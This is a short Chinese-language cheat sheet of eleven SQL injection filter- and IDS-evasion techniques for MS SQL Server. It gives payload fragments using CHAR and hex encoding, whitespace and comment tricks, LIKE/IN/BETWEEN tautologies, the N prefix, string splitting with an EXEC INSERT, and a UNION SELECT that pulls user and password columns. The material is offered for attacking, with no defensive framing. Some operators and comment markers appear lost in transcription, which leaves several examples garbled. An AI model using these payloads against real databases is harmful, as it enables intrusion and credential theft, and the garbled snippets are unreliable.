1、运用编码技术绕过 　　如URLEncode编码，ASCII编码绕过。 　　例如or 1=1即 　　or 1=1 　　而Test也可以为 　　CHAR(101) CHAR(97) CHAR(115) CHAR(116) 　　2、通过空格绕过 　　如两个空格代替一个空格，用Tab代替空格等，或者删除所有空格，如 　　or'' swords'' =‘swords''，由于mssql的松散性，我们可以把or ''swords'' 之间的空格去掉，并不影响运行。 　　3、运用字符串判断代替 　　用经典的or 1=1判断绕过, 　　如 　　or ''swords'' =''swords'' 　　这个方法就是网上在讨论的。 　　4、通过类型转换修饰符N绕过 　　可以说这是一个不错的想法，他除了能在某种程度上绕过限制，而且还有别的作用，大家自己好好想想吧。关于利用， 　　如 　　or ''swords'' = N'' swords'' 　　，大写的N告诉mssql server 字符串作为nvarchar类型，它起到类型转换的作用，并不影响注射语句本身，但是可以避过基于知识的模式匹配IDS。 　　5、通过 号拆解字符串绕过 　　效果值得考证，但毕竟是一种方法。如 　　or ''swords'' =‘sw'' '' ords'' ；EXEC(‘IN'' '' SERT INTO '' '' …..'' ) 　　6、通过LIKE绕过 　　以前怎么就没想到呢？ 　　如 　　or''swords'' LIKE ''sw'' 　　显然可以很轻松的绕过“=”“>”的限制…… 　　7、通过IN绕过 　　与上面的LIKE的思路差不多, 　　如 　　or ''swords'' IN (''swords'') 　　8、通过BETWEEN绕过 　　如 　　or ''swords'' BETWEEN ''rw'' AND ''tw'' 　　9、通过>或者<绕过 　　or ''swords''>''sw'' 　　or ''swords''<''tw'' 　　or 1<3 　　…… 　　10、运用注释语句绕过 　　用代替空格，如：UNION Select user，pwd，from tbluser 　　用分割敏感词，如：U NION SE LECT user，pwd from tbluser 　　11、用HEX绕过，一般的IDS都无法检测出来 　　0x730079007300610064006D0069006E00 =hex(sysadmin) 　　0x640062005F006F0077006E0065007200 =hex(db_owner)